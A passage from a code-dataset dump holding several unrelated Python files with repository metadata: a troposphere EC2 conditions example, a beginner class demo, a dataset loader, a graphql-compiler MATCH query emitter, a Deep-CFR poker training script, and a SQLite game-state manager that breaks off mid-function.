i+=1
# print Graph (optional)
if verbose:
self.GraphDraw(self._GPrintVerbose)
return self._Graph | en | 0.845614 | DocumentNGramSymWinGraph.py Created on May 23, 2017, 4:56 PM # an extension of DocumentNGramGraph # for symmetric windowing # set Data @class_variable # build ngram # calculate window # initialize graph # max possible window size (bounded by win) # first build the full window # if window's edge has reached # it's the limit of ng stop # appending # print Graph (optional) | 2.929513 | 3 |
examples/EC2Conditions.py | DrLuke/troposphere | 1 | 10334 | from __future__ import print_function
from troposphere import (
Template, Parameter, Ref, Condition, Equals, And, Or, Not, If
)
from troposphere import ec2
parameters = {
"One": Parameter(
"One",
Type="String",
),
"Two": Parameter(
"Two",
Type="String",
),
"Three": Parameter(
"Three",
Type="String",
),
"Four": Parameter(
"Four",
Type="String",
),
"SshKeyName": Parameter(
"SshKeyName",
Type="String",
)
}
conditions = {
"OneEqualsFoo": Equals(
Ref("One"),
"Foo"
),
"NotOneEqualsFoo": Not(
Condition("OneEqualsFoo")
),
"BarEqualsTwo": Equals(
"Bar",
Ref("Two")
),
"ThreeEqualsFour": Equals(
Ref("Three"),
Ref("Four")
),
"OneEqualsFooOrBarEqualsTwo": Or(
Condition("OneEqualsFoo"),
Condition("BarEqualsTwo")
),
"OneEqualsFooAndNotBarEqualsTwo": And(
Condition("OneEqualsFoo"),
Not(Condition("BarEqualsTwo"))
),
"OneEqualsFooAndBarEqualsTwoAndThreeEqualsPft": And(
Condition("OneEqualsFoo"),
Condition("BarEqualsTwo"),
Equals(Ref("Three"), "Pft")
),
"OneIsQuzAndThreeEqualsFour": And(
Equals(Ref("One"), "Quz"),
Condition("ThreeEqualsFour")
),
"LaunchInstance": And(
Condition("OneEqualsFoo"),
Condition("NotOneEqualsFoo"),
Condition("BarEqualsTwo"),
Condition("OneEqualsFooAndNotBarEqualsTwo"),
Condition("OneIsQuzAndThreeEqualsFour")
),
"LaunchWithGusto": And(
Condition("LaunchInstance"),
Equals(Ref("One"), "Gusto")
)
}
resources = {
"Ec2Instance": ec2.Instance(
"Ec2Instance",
Condition="LaunchInstance",
ImageId=If("ConditionNameEqualsFoo", "ami-12345678", "ami-87654321"),
InstanceType="t1.micro",
KeyName=Ref("SshKeyName"),
SecurityGroups=["default"],
)
}
t = Template()
for p in parameters.values():
t.add_parameter(p)
for k in conditions:
t.add_condition(k, conditions[k])
for r in resources.values():
t.add_resource(r)
print(t.to_json())
| from __future__ import print_function
from troposphere import (
Template, Parameter, Ref, Condition, Equals, And, Or, Not, If
)
from troposphere import ec2
parameters = {
"One": Parameter(
"One",
Type="String",
),
"Two": Parameter(
"Two",
Type="String",
),
"Three": Parameter(
"Three",
Type="String",
),
"Four": Parameter(
"Four",
Type="String",
),
"SshKeyName": Parameter(
"SshKeyName",
Type="String",
)
}
conditions = {
"OneEqualsFoo": Equals(
Ref("One"),
"Foo"
),
"NotOneEqualsFoo": Not(
Condition("OneEqualsFoo")
),
"BarEqualsTwo": Equals(
"Bar",
Ref("Two")
),
"ThreeEqualsFour": Equals(
Ref("Three"),
Ref("Four")
),
"OneEqualsFooOrBarEqualsTwo": Or(
Condition("OneEqualsFoo"),
Condition("BarEqualsTwo")
),
"OneEqualsFooAndNotBarEqualsTwo": And(
Condition("OneEqualsFoo"),
Not(Condition("BarEqualsTwo"))
),
"OneEqualsFooAndBarEqualsTwoAndThreeEqualsPft": And(
Condition("OneEqualsFoo"),
Condition("BarEqualsTwo"),
Equals(Ref("Three"), "Pft")
),
"OneIsQuzAndThreeEqualsFour": And(
Equals(Ref("One"), "Quz"),
Condition("ThreeEqualsFour")
),
"LaunchInstance": And(
Condition("OneEqualsFoo"),
Condition("NotOneEqualsFoo"),
Condition("BarEqualsTwo"),
Condition("OneEqualsFooAndNotBarEqualsTwo"),
Condition("OneIsQuzAndThreeEqualsFour")
),
"LaunchWithGusto": And(
Condition("LaunchInstance"),
Equals(Ref("One"), "Gusto")
)
}
resources = {
"Ec2Instance": ec2.Instance(
"Ec2Instance",
Condition="LaunchInstance",
ImageId=If("ConditionNameEqualsFoo", "ami-12345678", "ami-87654321"),
InstanceType="t1.micro",
KeyName=Ref("SshKeyName"),
SecurityGroups=["default"],
)
}
t = Template()
for p in parameters.values():
t.add_parameter(p)
for k in conditions:
t.add_condition(k, conditions[k])
for r in resources.values():
t.add_resource(r)
print(t.to_json())
| none | 1 | 2.65585 | 3 |
|
fist_phase/08_objects.py | kapuni/exercise_py | 0 | 10335 | class Student(object):
# __init__是一个特殊方法用于在创建对象时进行初始化操作
# 通过这个方法我们可以为学生对象绑定name和age两个属性
def __init__(self, name, age):
self.name = name
self.age = age
def study(self, course_name):
print('%s正在学习%s.' % (self.name, course_name))
# PEP 8要求标识符的名字用全小写多个单词用下划线连接
# 但是部分程序员和公司更倾向于使用驼峰命名法(驼峰标识)
def watch_movie(self):
if self.age < 18:
print('%s只能观看《熊出没》.' % self.name)
else:
print('%s正在观看岛国爱情大电影.' % self.name)
def main():
# 创建学生对象并指定姓名和年龄
stu1 = Student('骆昊', 38)
# 给对象发study消息
stu1.study('Python程序设计')
# 给对象发watch_av消息
stu1.watch_movie()
stu2 = Student('王大锤', 15)
stu2.study('思想品德')
stu2.watch_movie()
if __name__ == '__main__':
main() | class Student(object):
# __init__是一个特殊方法用于在创建对象时进行初始化操作
# 通过这个方法我们可以为学生对象绑定name和age两个属性
def __init__(self, name, age):
self.name = name
self.age = age
def study(self, course_name):
print('%s正在学习%s.' % (self.name, course_name))
# PEP 8要求标识符的名字用全小写多个单词用下划线连接
# 但是部分程序员和公司更倾向于使用驼峰命名法(驼峰标识)
def watch_movie(self):
if self.age < 18:
print('%s只能观看《熊出没》.' % self.name)
else:
print('%s正在观看岛国爱情大电影.' % self.name)
def main():
# 创建学生对象并指定姓名和年龄
stu1 = Student('骆昊', 38)
# 给对象发study消息
stu1.study('Python程序设计')
# 给对象发watch_av消息
stu1.watch_movie()
stu2 = Student('王大锤', 15)
stu2.study('思想品德')
stu2.watch_movie()
if __name__ == '__main__':
main() | zh | 0.981659 | # __init__是一个特殊方法用于在创建对象时进行初始化操作 # 通过这个方法我们可以为学生对象绑定name和age两个属性 # PEP 8要求标识符的名字用全小写多个单词用下划线连接 # 但是部分程序员和公司更倾向于使用驼峰命名法(驼峰标识) # 创建学生对象并指定姓名和年龄 # 给对象发study消息 # 给对象发watch_av消息 | 4.038315 | 4 |
lrtc_lib/data/load_dataset.py | MovestaDev/low-resource-text-classification-framework | 57 | 10336 | # (c) Copyright IBM Corporation 2020.
# LICENSE: Apache License 2.0 (Apache-2.0)
# http://www.apache.org/licenses/LICENSE-2.0
import logging
from lrtc_lib.data_access import single_dataset_loader
from lrtc_lib.data_access.processors.dataset_part import DatasetPart
from lrtc_lib.oracle_data_access import gold_labels_loader
logging.basicConfig(level=logging.INFO, format='%(asctime)s %(levelname)-8s [%(filename)s:%(lineno)d] %(message)s')
def load(dataset: str, force_new: bool = False):
for part in DatasetPart:
dataset_name = dataset + '_' + part.name.lower()
# load dataset (generate Documents and TextElements)
if force_new:
single_dataset_loader.clear_all_saved_files(dataset_name)
single_dataset_loader.load_dataset(dataset_name, force_new)
# load gold labels
if force_new:
gold_labels_loader.clear_gold_labels_file(dataset_name)
gold_labels_loader.load_gold_labels(dataset_name, force_new)
logging.info('-' * 60)
if __name__ == '__main__':
dataset_name = 'polarity'
load(dataset=dataset_name) | # (c) Copyright IBM Corporation 2020.
# LICENSE: Apache License 2.0 (Apache-2.0)
# http://www.apache.org/licenses/LICENSE-2.0
import logging
from lrtc_lib.data_access import single_dataset_loader
from lrtc_lib.data_access.processors.dataset_part import DatasetPart
from lrtc_lib.oracle_data_access import gold_labels_loader
logging.basicConfig(level=logging.INFO, format='%(asctime)s %(levelname)-8s [%(filename)s:%(lineno)d] %(message)s')
def load(dataset: str, force_new: bool = False):
for part in DatasetPart:
dataset_name = dataset + '_' + part.name.lower()
# load dataset (generate Documents and TextElements)
if force_new:
single_dataset_loader.clear_all_saved_files(dataset_name)
single_dataset_loader.load_dataset(dataset_name, force_new)
# load gold labels
if force_new:
gold_labels_loader.clear_gold_labels_file(dataset_name)
gold_labels_loader.load_gold_labels(dataset_name, force_new)
logging.info('-' * 60)
if __name__ == '__main__':
dataset_name = 'polarity'
load(dataset=dataset_name) | en | 0.45673 | # (c) Copyright IBM Corporation 2020. # LICENSE: Apache License 2.0 (Apache-2.0) # http://www.apache.org/licenses/LICENSE-2.0 # load dataset (generate Documents and TextElements) # load gold labels | 2.109836 | 2 |
graphql_compiler/compiler/emit_match.py | BarracudaPff/code-golf-data-pythpn | 0 | 10337 | <reponame>BarracudaPff/code-golf-data-pythpn
"""Convert lowered IR basic blocks to MATCH query strings."""
from collections import deque
import six
from .blocks import Filter, MarkLocation, QueryRoot, Recurse, Traverse
from .expressions import TrueLiteral
from .helpers import get_only_element_from_collection, validate_safe_string
def _get_vertex_location_name(location):
"""Get the location name from a location that is expected to point to a vertex."""
mark_name, field_name = location.get_location_name()
if field_name is not None:
raise AssertionError(u"Location unexpectedly pointed to a field: {}".format(location))
return mark_name
def _first_step_to_match(match_step):
"""Transform the very first MATCH step into a MATCH query string."""
parts = []
if match_step.root_block is not None:
if not isinstance(match_step.root_block, QueryRoot):
raise AssertionError(u"Expected None or QueryRoot root block, received: " u"{} {}".format(match_step.root_block, match_step))
match_step.root_block.validate()
start_class = get_only_element_from_collection(match_step.root_block.start_class)
parts.append(u"class: %s" % (start_class,))
if match_step.coerce_type_block is not None:
raise AssertionError(u"Invalid MATCH step: {}".format(match_step))
if match_step.where_block:
match_step.where_block.validate()
parts.append(u"where: (%s)" % (match_step.where_block.predicate.to_match(),))
if match_step.as_block is None:
raise AssertionError(u"Found a MATCH step without a corresponding Location. " u"This should never happen: {}".format(match_step))
else:
match_step.as_block.validate()
parts.append(u"as: %s" % (_get_vertex_location_name(match_step.as_block.location),))
return u"{{ %s }}" % (u", ".join(parts),)
def _subsequent_step_to_match(match_step):
"""Transform any subsequent (non-first) MATCH step into a MATCH query string."""
if not isinstance(match_step.root_block, (Traverse, Recurse)):
raise AssertionError(u"Expected Traverse root block, received: " u"{} {}".format(match_step.root_block, match_step))
is_recursing = isinstance(match_step.root_block, Recurse)
match_step.root_block.validate()
traversal_command = u".%s('%s')" % (match_step.root_block.direction, match_step.root_block.edge_name)
parts = []
if match_step.coerce_type_block:
coerce_type_set = match_step.coerce_type_block.target_class
if len(coerce_type_set) != 1:
raise AssertionError(u"Found MATCH type coercion block with more than one target class:" u" {} {}".format(coerce_type_set, match_step))
coerce_type_target = list(coerce_type_set)[0]
parts.append(u"class: %s" % (coerce_type_target,))
if is_recursing:
parts.append(u"while: ($depth < %d)" % (match_step.root_block.depth,))
if match_step.where_block:
match_step.where_block.validate()
parts.append(u"where: (%s)" % (match_step.where_block.predicate.to_match(),))
if not is_recursing and match_step.root_block.optional:
parts.append(u"optional: true")
if match_step.as_block:
match_step.as_block.validate()
parts.append(u"as: %s" % (_get_vertex_location_name(match_step.as_block.location),))
return u"%s {{ %s }}" % (traversal_command, u", ".join(parts))
def _represent_match_traversal(match_traversal):
"""Emit MATCH query code for an entire MATCH traversal sequence."""
output = []
output.append(_first_step_to_match(match_traversal[0]))
for step in match_traversal[1:]:
output.append(_subsequent_step_to_match(step))
return u"".join(output)
def _represent_fold(fold_location, fold_ir_blocks):
"""Emit a LET clause corresponding to the IR blocks for a @fold scope."""
start_let_template = u"$%(mark_name)s = %(base_location)s"
traverse_edge_template = u'.%(direction)s("%(edge_name)s")'
base_template = start_let_template + traverse_edge_template
edge_direction, edge_name = fold_location.get_first_folded_edge()
mark_name, _ = fold_location.get_location_name()
base_location_name, _ = fold_location.base_location.get_location_name()
validate_safe_string(mark_name)
validate_safe_string(base_location_name)
validate_safe_string(edge_direction)
validate_safe_string(edge_name)
template_data = {"mark_name": mark_name, "base_location": base_location_name, "direction": edge_direction, "edge_name": edge_name}
final_string = base_template % template_data
for block in fold_ir_blocks:
if isinstance(block, Filter):
final_string += u"[" + block.predicate.to_match() + u"]"
elif isinstance(block, Traverse):
template_data = {"direction": block.direction, "edge_name": block.edge_name}
final_string += traverse_edge_template % template_data
elif isinstance(block, MarkLocation):
pass
else:
raise AssertionError(u"Found an unexpected IR block in the folded IR blocks: " u"{} {} {}".format(type(block), block, fold_ir_blocks))
final_string += ".asList()"
return final_string
def _construct_output_to_match(output_block):
"""Transform a ConstructResult block into a MATCH query string."""
output_block.validate()
selections = (u"%s AS `%s`" % (output_block.fields[key].to_match(), key) for key in sorted(output_block.fields.keys()))
return u"SELECT %s FROM" % (u", ".join(selections),)
def _construct_where_to_match(where_block):
"""Transform a Filter block into a MATCH query string."""
if where_block.predicate == TrueLiteral:
raise AssertionError(u"Received WHERE block with TrueLiteral predicate: {}".format(where_block))
return u"WHERE " + where_block.predicate.to_match()
def emit_code_from_single_match_query(match_query):
"""Return a MATCH query string from a list of IR blocks."""
query_data = deque([u"MATCH "])
if not match_query.match_traversals:
raise AssertionError(u"Unexpected falsy value for match_query.match_traversals received: " u"{} {}".format(match_query.match_traversals, match_query))
match_traversal_data = [_represent_match_traversal(x) for x in match_query.match_traversals]
query_data.append(match_traversal_data[0])
for traversal_data in match_traversal_data[1:]:
query_data.append(u", ")
query_data.append(traversal_data)
query_data.appendleft(u" (")
query_data.append(u"RETURN $matches)")
fold_data = sorted([_represent_fold(fold_location, fold_ir_blocks) for fold_location, fold_ir_blocks in six.iteritems(match_query.folds)])
if fold_data:
query_data.append(u" LET ")
query_data.append(fold_data[0])
for fold_clause in fold_data[1:]:
query_data.append(u", ")
query_data.append(fold_clause)
query_data.appendleft(_construct_output_to_match(match_query.output_block))
if match_query.where_block is not None:
query_data.append(_construct_where_to_match(match_query.where_block))
return u" ".join(query_data)
def emit_code_from_multiple_match_queries(match_queries):
"""Return a MATCH query string from a list of MatchQuery namedtuples."""
optional_variable_base_name = "$optional__"
union_variable_name = "$result"
query_data = deque([u"SELECT EXPAND(", union_variable_name, u")", u" LET "])
optional_variables = []
sub_queries = [emit_code_from_single_match_query(match_query) for match_query in match_queries]
for (i, sub_query) in enumerate(sub_queries):
variable_name = optional_variable_base_name + str(i)
variable_assignment = variable_name + u" = ("
sub_query_end = u"),"
query_data.append(variable_assignment)
query_data.append(sub_query)
query_data.append(sub_query_end)
optional_variables.append(variable_name)
query_data.append(union_variable_name)
query_data.append(u" = UNIONALL(")
query_data.append(u", ".join(optional_variables))
query_data.append(u")")
return u" ".join(query_data)
def emit_code_from_ir(schema_info, compound_match_query):
"""Return a MATCH query string from a CompoundMatchQuery."""
match_queries = compound_match_query.match_queries
if len(match_queries) == 1:
query_string = emit_code_from_single_match_query(match_queries[0])
elif len(match_queries) > 1:
query_string = emit_code_from_multiple_match_queries(match_queries)
else:
raise AssertionError(u"Received CompoundMatchQuery with an empty list of MatchQueries: " u"{}".format(match_queries))
return query_string | """Convert lowered IR basic blocks to MATCH query strings."""
from collections import deque
import six
from .blocks import Filter, MarkLocation, QueryRoot, Recurse, Traverse
from .expressions import TrueLiteral
from .helpers import get_only_element_from_collection, validate_safe_string
def _get_vertex_location_name(location):
"""Get the location name from a location that is expected to point to a vertex."""
mark_name, field_name = location.get_location_name()
if field_name is not None:
raise AssertionError(u"Location unexpectedly pointed to a field: {}".format(location))
return mark_name
def _first_step_to_match(match_step):
"""Transform the very first MATCH step into a MATCH query string."""
parts = []
if match_step.root_block is not None:
if not isinstance(match_step.root_block, QueryRoot):
raise AssertionError(u"Expected None or QueryRoot root block, received: " u"{} {}".format(match_step.root_block, match_step))
match_step.root_block.validate()
start_class = get_only_element_from_collection(match_step.root_block.start_class)
parts.append(u"class: %s" % (start_class,))
if match_step.coerce_type_block is not None:
raise AssertionError(u"Invalid MATCH step: {}".format(match_step))
if match_step.where_block:
match_step.where_block.validate()
parts.append(u"where: (%s)" % (match_step.where_block.predicate.to_match(),))
if match_step.as_block is None:
raise AssertionError(u"Found a MATCH step without a corresponding Location. " u"This should never happen: {}".format(match_step))
else:
match_step.as_block.validate()
parts.append(u"as: %s" % (_get_vertex_location_name(match_step.as_block.location),))
return u"{{ %s }}" % (u", ".join(parts),)
def _subsequent_step_to_match(match_step):
"""Transform any subsequent (non-first) MATCH step into a MATCH query string."""
if not isinstance(match_step.root_block, (Traverse, Recurse)):
raise AssertionError(u"Expected Traverse root block, received: " u"{} {}".format(match_step.root_block, match_step))
is_recursing = isinstance(match_step.root_block, Recurse)
match_step.root_block.validate()
traversal_command = u".%s('%s')" % (match_step.root_block.direction, match_step.root_block.edge_name)
parts = []
if match_step.coerce_type_block:
coerce_type_set = match_step.coerce_type_block.target_class
if len(coerce_type_set) != 1:
raise AssertionError(u"Found MATCH type coercion block with more than one target class:" u" {} {}".format(coerce_type_set, match_step))
coerce_type_target = list(coerce_type_set)[0]
parts.append(u"class: %s" % (coerce_type_target,))
if is_recursing:
parts.append(u"while: ($depth < %d)" % (match_step.root_block.depth,))
if match_step.where_block:
match_step.where_block.validate()
parts.append(u"where: (%s)" % (match_step.where_block.predicate.to_match(),))
if not is_recursing and match_step.root_block.optional:
parts.append(u"optional: true")
if match_step.as_block:
match_step.as_block.validate()
parts.append(u"as: %s" % (_get_vertex_location_name(match_step.as_block.location),))
return u"%s {{ %s }}" % (traversal_command, u", ".join(parts))
def _represent_match_traversal(match_traversal):
"""Emit MATCH query code for an entire MATCH traversal sequence."""
output = []
output.append(_first_step_to_match(match_traversal[0]))
for step in match_traversal[1:]:
output.append(_subsequent_step_to_match(step))
return u"".join(output)
def _represent_fold(fold_location, fold_ir_blocks):
"""Emit a LET clause corresponding to the IR blocks for a @fold scope."""
start_let_template = u"$%(mark_name)s = %(base_location)s"
traverse_edge_template = u'.%(direction)s("%(edge_name)s")'
base_template = start_let_template + traverse_edge_template
edge_direction, edge_name = fold_location.get_first_folded_edge()
mark_name, _ = fold_location.get_location_name()
base_location_name, _ = fold_location.base_location.get_location_name()
validate_safe_string(mark_name)
validate_safe_string(base_location_name)
validate_safe_string(edge_direction)
validate_safe_string(edge_name)
template_data = {"mark_name": mark_name, "base_location": base_location_name, "direction": edge_direction, "edge_name": edge_name}
final_string = base_template % template_data
for block in fold_ir_blocks:
if isinstance(block, Filter):
final_string += u"[" + block.predicate.to_match() + u"]"
elif isinstance(block, Traverse):
template_data = {"direction": block.direction, "edge_name": block.edge_name}
final_string += traverse_edge_template % template_data
elif isinstance(block, MarkLocation):
pass
else:
raise AssertionError(u"Found an unexpected IR block in the folded IR blocks: " u"{} {} {}".format(type(block), block, fold_ir_blocks))
final_string += ".asList()"
return final_string
def _construct_output_to_match(output_block):
"""Transform a ConstructResult block into a MATCH query string."""
output_block.validate()
selections = (u"%s AS `%s`" % (output_block.fields[key].to_match(), key) for key in sorted(output_block.fields.keys()))
return u"SELECT %s FROM" % (u", ".join(selections),)
def _construct_where_to_match(where_block):
"""Transform a Filter block into a MATCH query string."""
if where_block.predicate == TrueLiteral:
raise AssertionError(u"Received WHERE block with TrueLiteral predicate: {}".format(where_block))
return u"WHERE " + where_block.predicate.to_match()
def emit_code_from_single_match_query(match_query):
"""Return a MATCH query string from a list of IR blocks."""
query_data = deque([u"MATCH "])
if not match_query.match_traversals:
raise AssertionError(u"Unexpected falsy value for match_query.match_traversals received: " u"{} {}".format(match_query.match_traversals, match_query))
match_traversal_data = [_represent_match_traversal(x) for x in match_query.match_traversals]
query_data.append(match_traversal_data[0])
for traversal_data in match_traversal_data[1:]:
query_data.append(u", ")
query_data.append(traversal_data)
query_data.appendleft(u" (")
query_data.append(u"RETURN $matches)")
fold_data = sorted([_represent_fold(fold_location, fold_ir_blocks) for fold_location, fold_ir_blocks in six.iteritems(match_query.folds)])
if fold_data:
query_data.append(u" LET ")
query_data.append(fold_data[0])
for fold_clause in fold_data[1:]:
query_data.append(u", ")
query_data.append(fold_clause)
query_data.appendleft(_construct_output_to_match(match_query.output_block))
if match_query.where_block is not None:
query_data.append(_construct_where_to_match(match_query.where_block))
return u" ".join(query_data)
def emit_code_from_multiple_match_queries(match_queries):
"""Return a MATCH query string from a list of MatchQuery namedtuples."""
optional_variable_base_name = "$optional__"
union_variable_name = "$result"
query_data = deque([u"SELECT EXPAND(", union_variable_name, u")", u" LET "])
optional_variables = []
sub_queries = [emit_code_from_single_match_query(match_query) for match_query in match_queries]
for (i, sub_query) in enumerate(sub_queries):
variable_name = optional_variable_base_name + str(i)
variable_assignment = variable_name + u" = ("
sub_query_end = u"),"
query_data.append(variable_assignment)
query_data.append(sub_query)
query_data.append(sub_query_end)
optional_variables.append(variable_name)
query_data.append(union_variable_name)
query_data.append(u" = UNIONALL(")
query_data.append(u", ".join(optional_variables))
query_data.append(u")")
return u" ".join(query_data)
def emit_code_from_ir(schema_info, compound_match_query):
"""Return a MATCH query string from a CompoundMatchQuery."""
match_queries = compound_match_query.match_queries
if len(match_queries) == 1:
query_string = emit_code_from_single_match_query(match_queries[0])
elif len(match_queries) > 1:
query_string = emit_code_from_multiple_match_queries(match_queries)
else:
raise AssertionError(u"Received CompoundMatchQuery with an empty list of MatchQueries: " u"{}".format(match_queries))
return query_string | en | 0.82796 | Convert lowered IR basic blocks to MATCH query strings. Get the location name from a location that is expected to point to a vertex. Transform the very first MATCH step into a MATCH query string. Transform any subsequent (non-first) MATCH step into a MATCH query string. Emit MATCH query code for an entire MATCH traversal sequence. Emit a LET clause corresponding to the IR blocks for a @fold scope. Transform a ConstructResult block into a MATCH query string. Transform a Filter block into a MATCH query string. Return a MATCH query string from a list of IR blocks. Return a MATCH query string from a list of MatchQuery namedtuples. Return a MATCH query string from a CompoundMatchQuery. | 2.736345 | 3 |
mo_leduc.py | mohamedun/Deep-CFR | 0 | 10338 | <gh_stars>0
from PokerRL.game.games import StandardLeduc
from PokerRL.game.games import BigLeduc
from PokerRL.eval.rl_br.RLBRArgs import RLBRArgs
from PokerRL.eval.lbr.LBRArgs import LBRArgs
from PokerRL.game.bet_sets import POT_ONLY
from DeepCFR.EvalAgentDeepCFR import EvalAgentDeepCFR
from DeepCFR.TrainingProfile import TrainingProfile
from DeepCFR.workers.driver.Driver import Driver
import pdb
if __name__ == '__main__':
ctrl = Driver(t_prof=TrainingProfile(name="MO_LEDUC_BigLeduc_LBR",
nn_type="feedforward",
eval_agent_export_freq=3,
checkpoint_freq=3,
n_learner_actor_workers=5,
max_buffer_size_adv=1e6,
n_traversals_per_iter=500,
n_batches_adv_training=250,
mini_batch_size_adv=2048,
game_cls=BigLeduc,
n_units_final_adv=64,
n_merge_and_table_layer_units_adv=64,
init_adv_model="random", # warm start neural weights with init from last iter
use_pre_layers_adv=False, # shallower nets
use_pre_layers_avrg=False, # shallower nets
# You can specify one or both modes. Choosing both is useful to compare them.
eval_modes_of_algo=(
EvalAgentDeepCFR.EVAL_MODE_SINGLE, # SD-CFR
),
DISTRIBUTED=True,
log_verbose=True,
rl_br_args=RLBRArgs(rlbr_bet_set=None,
n_hands_each_seat=200,
n_workers=1,
# Training
DISTRIBUTED=False,
n_iterations=100,
play_n_games_per_iter=50,
# The DDQN
batch_size=512,
),
lbr_args=LBRArgs(n_lbr_hands_per_seat=30000,
n_parallel_lbr_workers=10,
DISTRIBUTED=True,
),
),
eval_methods={'br': 1,
#'rlbr': 1,
'lbr': 1,
},
n_iterations=12)
ctrl.run()
pdb.set_trace()
| from PokerRL.game.games import StandardLeduc
from PokerRL.game.games import BigLeduc
from PokerRL.eval.rl_br.RLBRArgs import RLBRArgs
from PokerRL.eval.lbr.LBRArgs import LBRArgs
from PokerRL.game.bet_sets import POT_ONLY
from DeepCFR.EvalAgentDeepCFR import EvalAgentDeepCFR
from DeepCFR.TrainingProfile import TrainingProfile
from DeepCFR.workers.driver.Driver import Driver
import pdb
if __name__ == '__main__':
ctrl = Driver(t_prof=TrainingProfile(name="MO_LEDUC_BigLeduc_LBR",
nn_type="feedforward",
eval_agent_export_freq=3,
checkpoint_freq=3,
n_learner_actor_workers=5,
max_buffer_size_adv=1e6,
n_traversals_per_iter=500,
n_batches_adv_training=250,
mini_batch_size_adv=2048,
game_cls=BigLeduc,
n_units_final_adv=64,
n_merge_and_table_layer_units_adv=64,
init_adv_model="random", # warm start neural weights with init from last iter
use_pre_layers_adv=False, # shallower nets
use_pre_layers_avrg=False, # shallower nets
# You can specify one or both modes. Choosing both is useful to compare them.
eval_modes_of_algo=(
EvalAgentDeepCFR.EVAL_MODE_SINGLE, # SD-CFR
),
DISTRIBUTED=True,
log_verbose=True,
rl_br_args=RLBRArgs(rlbr_bet_set=None,
n_hands_each_seat=200,
n_workers=1,
# Training
DISTRIBUTED=False,
n_iterations=100,
play_n_games_per_iter=50,
# The DDQN
batch_size=512,
),
lbr_args=LBRArgs(n_lbr_hands_per_seat=30000,
n_parallel_lbr_workers=10,
DISTRIBUTED=True,
),
),
eval_methods={'br': 1,
#'rlbr': 1,
'lbr': 1,
},
n_iterations=12)
ctrl.run()
pdb.set_trace() | en | 0.785843 | # warm start neural weights with init from last iter # shallower nets # shallower nets # You can specify one or both modes. Choosing both is useful to compare them. # SD-CFR # Training # The DDQN #'rlbr': 1, | 1.854403 | 2 |
geocircles/backend/gamestate.py | tmick0/geocircles | 0 | 10339 | <gh_stars>0
import sqlite3
from enum import Enum
import random
__all__ = ['state_mgr', 'game_state', 'next_state']
class game_state (Enum):
NEW_GAME = 0
WAITING_FOR_HOST = 1
HOST_CHOOSING = 2
GUEST_GUESSING = 3
GUEST_CHOOSING = 4
HOST_GUESSING = 5
def next_state(s):
if s == game_state.WAITING_FOR_HOST.value:
return game_state.GUEST_CHOOSING.value
elif s == game_state.GUEST_CHOOSING.value:
return game_state.HOST_GUESSING.value
elif s == game_state.HOST_CHOOSING.value:
return game_state.GUEST_GUESSING.value
elif s == game_state.GUEST_GUESSING.value:
return game_state.GUEST_CHOOSING.value
elif s == game_state.HOST_GUESSING.value:
return game_state.HOST_CHOOSING.value
class state_mgr (object):
def __init__(self, path):
self.db = sqlite3.connect(path)
cur = self.db.cursor()
cur.execute('''
create table if not exists game (
game_id integer primary key,
state integer default {:d}
)
'''.format(game_state.NEW_GAME.value))
cur.execute('''
create table if not exists session (
session_id integer primary key,
game_id integer not null references game (game_id),
position integer not null,
display_name text not null
)
''')
cur.execute('''
create table if not exists challenge (
challenge_id integer primary key autoincrement,
game_id integer not null references game (game_id),
lat real not null,
lon real not null,
pano text not null,
heading real not null,
pitch real not null,
zoom real not null,
guesses int not null,
radius int not null
)
''')
cur.execute('''
create table if not exists guess (
guess_id integer primary key autoincrement,
challenge_id integer not null references challenge (challenge_id),
lat real not null,
lon real not null,
radius real not null,
good integer not null
)
''')
cur.execute('''
create table if not exists rules (
game_id integer primary key not null references game (game_id),
max_circle integer not null,
min_circle integer not null,
num_circles integer not null,
num_guesses integer not null,
difficulty text not null
)
''')
self.db.commit()
def create_game(self, display_name):
game = random.getrandbits(16)
session = random.getrandbits(32)
cur = self.db.cursor()
cur.execute('insert into game (game_id) values (?)', [game])
cur.execute('insert into session (session_id, game_id, position, display_name) values (?, ?, ?, ?)', [
session, game, 0, display_name])
self.db.commit()
return game, session
def join_game(self, game, display_name):
session = random.getrandbits(32)
cur = self.db.cursor()
cur.execute('insert into session (session_id, game_id, position, display_name) values (?, ?, ?, ?)', [
session, game, 1, display_name])
cur.execute('update game set state = ? where game_id = ?',
[game_state.WAITING_FOR_HOST.value, game])
self.db.commit()
return session
def set_rules(self, game, rules):
cur = self.db.cursor()
cur.execute('''
insert into rules (game_id, max_circle, min_circle, num_circles, num_guesses, difficulty)
values (?, ?, ?, ?, ?, ?)
''', [game, rules['start_size'], rules['end_size'], rules['num_circles'], rules['num_guesses'], rules['difficulty']])
self.db.commit()
def get_rules(self, game):
cur = self.db.cursor()
cur.execute('''
select max_circle, min_circle, num_circles, num_guesses, difficulty from rules where game_id = ?
''', [game])
start_size, end_size, num_circles, num_guesses, difficulty = cur.fetchone()
return {
'start_size': start_size,
'end_size': end_size,
'num_circles': num_circles,
'num_guesses': num_guesses,
'difficulty': difficulty
}
def resume_session(self, session):
cur = self.db.cursor()
cur.execute(
'select game.game_id, state, position, display_name from session left join game on session.game_id = game.game_id where session_id = ?', [session])
return cur.fetchone()
def get_host_session(self, session):
cur = self.db.cursor()
cur.execute('''
select game.game_id, host.session_id from
session as guest
left join game on guest.game_id = game.game_id
left join session as host on host.game_id = game.game_id
where guest.session_id = ? and host.position = 0
''', [session])
return cur.fetchone()
def get_guest_session(self, session):
cur = self.db.cursor()
cur.execute('''
select game.game_id, guest.session_id from
session as host
left join game on host.game_id = game.game_id
left join session as guest on guest.game_id = game.game_id
where host.session_id = ? and guest.position = 1
''', [session])
return cur.fetchone()
def get_session_info(self, session):
cur = self.db.cursor()
cur.execute(
'select game.game_id, game.state, session.position from session left join game on session.game_id = game.game_id where session_id = ?', [session])
return cur.fetchone()
def get_game_sessions(self, game):
cur = self.db.cursor()
cur.execute(
'select session_id from session where game_id = ? order by position asc', [game])
return [sid for (sid,) in cur.fetchall()]
def set_state(self, game, state):
cur = self.db.cursor()
cur.execute('update game set state = ? where game_id = ?',
[state, game])
self.db.commit()
def set_challenge(self, game, lat, lon, pano, heading, pitch, zoom, guesses, radius):
cur = self.db.cursor()
cur.execute('insert into challenge (game_id, lat, lon, pano, heading, pitch, zoom, guesses, radius) values (?, ?, ?, ?, ?, ?, ?, ?, ?)', [
game, lat, lon, pano, heading, pitch, zoom, guesses, radius])
self.db.commit()
def update_challenge(self, game, guesses, radius):
cur = self.db.cursor()
cur.execute(
'select challenge_id from challenge where game_id = ? order by challenge_id desc', [game])
challenge, = cur.fetchone()
cur.execute('update challenge set guesses = ?, radius = ? where challenge_id = ?', [
guesses, radius, challenge])
self.db.commit()
def get_challenge(self, game):
